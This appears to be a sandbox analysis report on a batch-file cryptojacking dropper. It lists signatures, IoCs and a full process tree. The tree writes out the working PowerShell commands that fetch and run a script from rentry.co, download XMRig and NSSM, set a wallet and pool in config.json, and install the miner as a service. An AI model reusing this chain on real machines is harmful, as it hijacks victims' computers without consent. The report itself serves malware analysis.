xmrig | 4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
1050s
max time network
1045s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
30/06/2024, 10:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2301347706499.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral3/files/0x000100000002a9ce-60.dat	family_xmrig
behavioral3/files/0x000100000002a9ce-60.dat	xmrig
behavioral3/memory/3528-63-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-189-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-190-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-191-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-192-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-193-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-194-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-195-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-196-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-197-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-198-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-199-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-200-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-201-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-202-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-203-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-204-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-205-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-206-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-207-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-208-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-209-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-210-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-211-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-212-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-213-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-214-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-215-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-216-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-217-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-218-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-219-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-220-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-222-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-223-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-224-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-225-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-226-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-227-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-228-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-229-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-230-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-231-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-232-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-233-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-234-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-235-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-236-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-237-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-238-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-239-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-240-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-241-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-242-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-243-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-244-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-245-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-246-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-247-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-248-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-249-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/3204-250-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	3288	powershell.exe
3	1240	powershell.exe
5	3516	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
3528	xmrig.exe
3108	nssm.exe
4720	nssm.exe
2576	nssm.exe
344	nssm.exe
2400	nssm.exe
3936	nssm.exe
1152	nssm.exe
3204	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
1	raw.githubusercontent.com
3	raw.githubusercontent.com
5	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1672	sc.exe
3720	sc.exe
1976	sc.exe
2204	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3616	powershell.exe
2004	powershell.exe
3652	powershell.exe
4972	powershell.exe
3288	powershell.exe
1900	powershell.exe
2036	powershell.exe
2444	powershell.exe
3516	powershell.exe
4128	powershell.exe
1240	powershell.exe
3224	powershell.exe
2992	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
2752	timeout.exe
3996	Process not Found
4160	Process not Found
1416	Process not Found
1448	Process not Found
5064	timeout.exe
3948	timeout.exe
4340	Process not Found
4268	timeout.exe
1932	timeout.exe
32	Process not Found
4492	Process not Found
1304	timeout.exe
1924	timeout.exe
3612	timeout.exe
1200	timeout.exe
3556	timeout.exe
2432	Process not Found
3580	Process not Found
2808	timeout.exe
1600	Process not Found
1676	timeout.exe
4428	timeout.exe
5088	timeout.exe
4616	timeout.exe
4840	Process not Found
5000	timeout.exe
4940	timeout.exe
4000	Process not Found
488	Process not Found
4796	timeout.exe
2868	timeout.exe
4000	timeout.exe
4460	Process not Found
232	Process not Found
1508	Process not Found
1832	Process not Found
4492	timeout.exe
4744	timeout.exe
2600	timeout.exe
4412	Process not Found
4068	timeout.exe
2624	timeout.exe
3776	Process not Found
752	timeout.exe
3232	timeout.exe
1560	timeout.exe
3576	Process not Found
3516	timeout.exe
4940	timeout.exe
4736	timeout.exe
2812	timeout.exe
1556	timeout.exe
4376	timeout.exe
2604	timeout.exe
232	timeout.exe
1336	timeout.exe
5032	timeout.exe
1088	timeout.exe
4160	Process not Found
3732	Process not Found
2424	Process not Found
392	Process not Found
4136	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3108	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
3288	powershell.exe
3288	powershell.exe
1240	powershell.exe
1240	powershell.exe
3224	powershell.exe
3224	powershell.exe
3616	powershell.exe
3616	powershell.exe
1900	powershell.exe
1900	powershell.exe
2004	powershell.exe
2004	powershell.exe
2992	powershell.exe
2992	powershell.exe
2444	powershell.exe
2444	powershell.exe
3652	powershell.exe
3652	powershell.exe
4128	powershell.exe
4128	powershell.exe
2036	powershell.exe
2036	powershell.exe
3516	powershell.exe
3516	powershell.exe
4972	powershell.exe
4972	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3288	powershell.exe
Token: SeDebugPrivilege	3108	taskkill.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeDebugPrivilege	3616	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	3516	powershell.exe
Token: SeDebugPrivilege	4972	powershell.exe
Token: SeLockMemoryPrivilege	3204	xmrig.exe
Token: SeIncreaseQuotaPrivilege	1376	WMIC.exe
Token: SeSecurityPrivilege	1376	WMIC.exe
Token: SeTakeOwnershipPrivilege	1376	WMIC.exe
Token: SeLoadDriverPrivilege	1376	WMIC.exe
Token: SeSystemProfilePrivilege	1376	WMIC.exe
Token: SeSystemtimePrivilege	1376	WMIC.exe
Token: SeProfSingleProcessPrivilege	1376	WMIC.exe
Token: SeIncBasePriorityPrivilege	1376	WMIC.exe
Token: SeCreatePagefilePrivilege	1376	WMIC.exe
Token: SeBackupPrivilege	1376	WMIC.exe
Token: SeRestorePrivilege	1376	WMIC.exe
Token: SeShutdownPrivilege	1376	WMIC.exe
Token: SeDebugPrivilege	1376	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1376	WMIC.exe
Token: SeRemoteShutdownPrivilege	1376	WMIC.exe
Token: SeUndockPrivilege	1376	WMIC.exe
Token: SeManageVolumePrivilege	1376	WMIC.exe
Token: 33	1376	WMIC.exe
Token: 34	1376	WMIC.exe
Token: 35	1376	WMIC.exe
Token: 36	1376	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1376	WMIC.exe
Token: SeSecurityPrivilege	1376	WMIC.exe
Token: SeTakeOwnershipPrivilege	1376	WMIC.exe
Token: SeLoadDriverPrivilege	1376	WMIC.exe
Token: SeSystemProfilePrivilege	1376	WMIC.exe
Token: SeSystemtimePrivilege	1376	WMIC.exe
Token: SeProfSingleProcessPrivilege	1376	WMIC.exe
Token: SeIncBasePriorityPrivilege	1376	WMIC.exe
Token: SeCreatePagefilePrivilege	1376	WMIC.exe
Token: SeBackupPrivilege	1376	WMIC.exe
Token: SeRestorePrivilege	1376	WMIC.exe
Token: SeShutdownPrivilege	1376	WMIC.exe
Token: SeDebugPrivilege	1376	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1376	WMIC.exe
Token: SeRemoteShutdownPrivilege	1376	WMIC.exe
Token: SeUndockPrivilege	1376	WMIC.exe
Token: SeManageVolumePrivilege	1376	WMIC.exe
Token: 33	1376	WMIC.exe
Token: 34	1376	WMIC.exe
Token: 35	1376	WMIC.exe
Token: 36	1376	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1216	WMIC.exe
Token: SeSecurityPrivilege	1216	WMIC.exe
Token: SeTakeOwnershipPrivilege	1216	WMIC.exe
Token: SeLoadDriverPrivilege	1216	WMIC.exe
Token: SeSystemProfilePrivilege	1216	WMIC.exe
Token: SeSystemtimePrivilege	1216	WMIC.exe
Token: SeProfSingleProcessPrivilege	1216	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3204	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3668 wrote to memory of 3288	3668	cmd.exe	78
PID 3668 wrote to memory of 3288	3668	cmd.exe	78
PID 3288 wrote to memory of 3952	3288	powershell.exe	79
PID 3288 wrote to memory of 3952	3288	powershell.exe	79
PID 3952 wrote to memory of 3768	3952	cmd.exe	80
PID 3952 wrote to memory of 3768	3952	cmd.exe	80
PID 3768 wrote to memory of 4416	3768	net.exe	81
PID 3768 wrote to memory of 4416	3768	net.exe	81
PID 3952 wrote to memory of 3228	3952	cmd.exe	82
PID 3952 wrote to memory of 3228	3952	cmd.exe	82
PID 3952 wrote to memory of 3052	3952	cmd.exe	83
PID 3952 wrote to memory of 3052	3952	cmd.exe	83
PID 3952 wrote to memory of 1840	3952	cmd.exe	84
PID 3952 wrote to memory of 1840	3952	cmd.exe	84
PID 3952 wrote to memory of 2608	3952	cmd.exe	85
PID 3952 wrote to memory of 2608	3952	cmd.exe	85
PID 3952 wrote to memory of 1516	3952	cmd.exe	86
PID 3952 wrote to memory of 1516	3952	cmd.exe	86
PID 3952 wrote to memory of 2204	3952	cmd.exe	87
PID 3952 wrote to memory of 2204	3952	cmd.exe	87
PID 3952 wrote to memory of 1672	3952	cmd.exe	88
PID 3952 wrote to memory of 1672	3952	cmd.exe	88
PID 3952 wrote to memory of 3108	3952	cmd.exe	89
PID 3952 wrote to memory of 3108	3952	cmd.exe	89
PID 3952 wrote to memory of 1240	3952	cmd.exe	91
PID 3952 wrote to memory of 1240	3952	cmd.exe	91
PID 3952 wrote to memory of 3224	3952	cmd.exe	92
PID 3952 wrote to memory of 3224	3952	cmd.exe	92
PID 3952 wrote to memory of 3616	3952	cmd.exe	93
PID 3952 wrote to memory of 3616	3952	cmd.exe	93
PID 3952 wrote to memory of 3528	3952	cmd.exe	94
PID 3952 wrote to memory of 3528	3952	cmd.exe	94
PID 3952 wrote to memory of 4280	3952	cmd.exe	95
PID 3952 wrote to memory of 4280	3952	cmd.exe	95
PID 4280 wrote to memory of 1900	4280	cmd.exe	96
PID 4280 wrote to memory of 1900	4280	cmd.exe	96
PID 1900 wrote to memory of 2432	1900	powershell.exe	97
PID 1900 wrote to memory of 2432	1900	powershell.exe	97
PID 3952 wrote to memory of 2004	3952	cmd.exe	98
PID 3952 wrote to memory of 2004	3952	cmd.exe	98
PID 3952 wrote to memory of 2992	3952	cmd.exe	99
PID 3952 wrote to memory of 2992	3952	cmd.exe	99
PID 3952 wrote to memory of 2444	3952	cmd.exe	100
PID 3952 wrote to memory of 2444	3952	cmd.exe	100
PID 3952 wrote to memory of 3652	3952	cmd.exe	101
PID 3952 wrote to memory of 3652	3952	cmd.exe	101
PID 3952 wrote to memory of 4128	3952	cmd.exe	102
PID 3952 wrote to memory of 4128	3952	cmd.exe	102
PID 3952 wrote to memory of 2036	3952	cmd.exe	103
PID 3952 wrote to memory of 2036	3952	cmd.exe	103
PID 3952 wrote to memory of 3516	3952	cmd.exe	104
PID 3952 wrote to memory of 3516	3952	cmd.exe	104
PID 3952 wrote to memory of 4972	3952	cmd.exe	105
PID 3952 wrote to memory of 4972	3952	cmd.exe	105
PID 3952 wrote to memory of 3720	3952	cmd.exe	106
PID 3952 wrote to memory of 3720	3952	cmd.exe	106
PID 3952 wrote to memory of 1976	3952	cmd.exe	107
PID 3952 wrote to memory of 1976	3952	cmd.exe	107
PID 3952 wrote to memory of 3108	3952	cmd.exe	108
PID 3952 wrote to memory of 3108	3952	cmd.exe	108
PID 3952 wrote to memory of 4720	3952	cmd.exe	109
PID 3952 wrote to memory of 4720	3952	cmd.exe	109
PID 3952 wrote to memory of 2576	3952	cmd.exe	110
PID 3952 wrote to memory of 2576	3952	cmd.exe	110

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2301347706499.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7A31.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3952
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3768
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:4416
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:3228
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:3052
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:1840
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:2608
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:1516
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:2204
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1672
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3108
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1240
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3616
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:3528
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4280
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1900
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:2432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Hrcpjxuv\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4128
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3516
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4972
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3720
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1976
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:3108
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:4720
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:2576
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:344
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:2400
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:3936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1376
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3964
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1216
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3844
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3160
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2004
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4936
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1964
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1528
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4952
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
